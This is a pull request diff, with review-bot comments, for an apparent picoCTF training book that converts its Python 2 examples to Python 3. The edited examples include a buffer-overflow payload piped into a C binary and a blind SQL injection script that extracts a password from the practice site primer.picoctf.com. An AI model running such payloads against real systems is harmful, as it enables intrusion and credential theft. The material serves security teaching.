Merge pull request #17 from arnavm30/master
More python updates, also resolved issue #16
cpaivw authored Mar 19, 2021
2 parents 83c9363 + 72521a5 commit 7b9dbcd
Showing 3 changed files with 17 additions and 17 deletions.
6 changes: 3 additions & 3 deletions chapters/binary.adoc
Expand Up @@ -119,12 +119,12 @@ HelloPicoCTF
The program did what it was written for. Now, we are going to send a particular string to the program using python. You can run a single line of python in the command using the flag -c, and enclosing the line of code between single quotes. In the terminal you can pass the output of one command as the input to other command using the pipe, which is this character "|". In the following command we are printing something in python, and passing that to the C program we just compiled.

[source, python]
python -c 'print "hello world!" ' |./v1
python3 -c 'print("hello world!")' |./v1

You should see "hello world!" printed back to the terminal right after the command. Note that in python you can repeat the same character if you multiply it by a number, so 128*"@" is simply a string composed by 128 "@" repeated. For example if you run:

[source, python]
python -c 'print 10*"@"'
python3 -c 'print(10*"@")'

You should see the output:
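Review bot: the prose in the first paragraph of this hunk still says "using python" and "a single line of python" while both commands below it now invoke `python3`; on many systems `python` still resolves to Python 2 or is not installed at all, so the sentence should name the interpreter the reader is expected to run, e.g. "send a particular string to the program using python3" and "run a single line of python3 in the command using the flag -c".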

Expand All @@ -134,7 +134,7 @@ AAAAAAAAAA
Now we are going to send a string that is composed by 128 characters repeated, concatenated to some bytes.

[source, python]
python -c 'print 128*"@"+"\x20\xe0\xff\xff\xff\x7f\x00\x00\xb7\x05\x40\x00"' |./v1
python3 -c 'print(128*"@"+"\x20\xe0\xff\xff\xff\x7f\x00\x00\xb7\x05\x40\x00")' |./v1

As result you will see:
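Review bot: the python3 form of this command is not byte-for-byte equivalent to the python2 form it replaces. In Python 3, `print(128*"@"+"\x20\xe0\xff...")` prints a str, and code points above 0x7f such as `\xe0` and `\xff` are passed through the terminal's default encoding (usually UTF-8, two bytes each) before they reach `./v1`, so the program receives a longer and different input than the python2 command sent, and the result the text announces ("As result you will see:") will not match. Either keep a python2 command for this one example or write raw bytes, e.g. `python3 -c 'import sys; sys.stdout.buffer.write(128*b"@" + b"\x20\xe0..." + b"\n")' | ./v1`, and say in the text that this string is binary data rather than printable text.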

16 changes: 8 additions & 8 deletions chapters/python.adoc
Expand Up @@ -383,12 +383,12 @@ Save the file. Now, in the same folder, create a program with the following code

[source, python]
filepath = "pico.txt"
cnt = 1
i = 1
with open(filepath, "r") as my_file:
for line in my_file:
print(cnt)
print(i)
print(line)
cnt += 1
i += 1

[source, python]
You should see the following output when you run the program:
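Review bot: renaming `cnt` to `i` makes the code less self-describing, not more: `i` conventionally names a loop index, whereas this variable is a 1-based line number printed next to each line, so `line_number` (or simply keeping `cnt`) reads better in a beginners' chapter. If the aim is idiomatic Python, the manual counter can go entirely with `for i, line in enumerate(my_file, start=1):`. Separately, the `[source, python]` marker directly above "You should see the following output when you run the program:" sits in front of prose rather than code and looks stray; it should move below that sentence, in front of the output listing.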
Expand Down Expand Up @@ -418,26 +418,26 @@ If you want to save your output in another file, you can easily do it in the fol
[source, python]
filepath_read = "pico.txt"
filepath_write = "outputpico.txt"
cnt = 1
i = 1
with open(filepath_read, "r") as file_read:
with open(filepath_write, "w") as file_write:
for line in file_read:
file_write.write(str(cnt) + "\n")
file_write.write(str(i) + "\n")
file_write.write(line + "\n")
cnt += 1
i += 1
print("look inside your folder...")

We introduced some new concepts in this code. This:

[source, python]
str(cnt)
str(i)

Is a cast from an integer to string. We want to convert that integer into a string to be able to concatenate two strings. For example, if we have the string "hello" and the integer 123, and we want to create a string that is "hello123", we can concatenate those two values. But first, we need to convert the integer to string, otherwise python will show an error. To concatenate strings, we use the operator '+'. When we add two strings, python will concatenate them. When we add two integers, python will do a mathematical addition. To represent a break of line in a string, we use "\n".

After this explanation, you should know that this:

[source, python]
str(cnt) + "\n"
str(i) + "\n"

Simply converts an integer to string, and then we concatenate a break line to it. We do that, because the function line write() does not add a breakline to the string after it writes it, so we would have a file with a single huge line of text if we don’t do that. When you run the code, you should see no output in the terminal, but if you show the contents of the folder you are in, you should see a new file called 'outputpico.txt'. If you show the contents of that file, you should see the following:
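Review bot: the rename to `i` is applied consistently here, but the unchanged line right after it, `file_write.write(line + "\n")`, writes a second newline because `line` as read from the file already ends with one, so outputpico.txt gets a blank line after every text line while the explanation only accounts for the `"\n"` added after `str(i)`. Either write `file_write.write(line)` (or `line.rstrip("\n") + "\n"` if the last line of pico.txt may lack a trailing newline), or say in the text that the blank lines are expected and show them in the output listing that follows.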

12 changes: 6 additions & 6 deletions chapters/sql.adoc
Expand Up @@ -238,18 +238,18 @@ You could possibly find the whole password manually, but it would take too much
[source, python]
import requests
from string import printable
accum=""
accum = ""
for i in range(40):
for letter in printable:
accum+=letter
accum += letter
r = requests.post("http://primer.picoctf.com/vuln/web/blindsql.php?&username=WeDontCare&password=' or '"
+ letter+"'=( select substr(binary password,"+str(i)+",1) from pico_blind_injection where id=1 ) and ''= '")
if 'NOTHING FOUND...' in r.text:
accum=accum[:-1]
print "nope"
accum = accum[:-1]
print("nope")
else:
print "We found the character: "+letter
print accum
print(f"We found the character: {letter}")
print(accum)


This script is just one of the many ways in which a blind SQL injection is done. With your knowledge of Python and SQL, you should be able to understand the script if you read it carefully. Note the following:
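Review bot: `print(f"We found the character: {letter}")` introduces an f-string, which needs Python 3.6 or newer, whereas every other change in this pull request only requires Python 3; either state that minimum version in the chapter or use plain concatenation, `print("We found the character: " + letter)`, which is also consistent with the `str(i)`-based concatenation that builds the request URL two lines above and that this hunk leaves untouched. Mixing both styles in a ten-line teaching script will confuse exactly the readers the surrounding paragraph says should be able to follow it.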
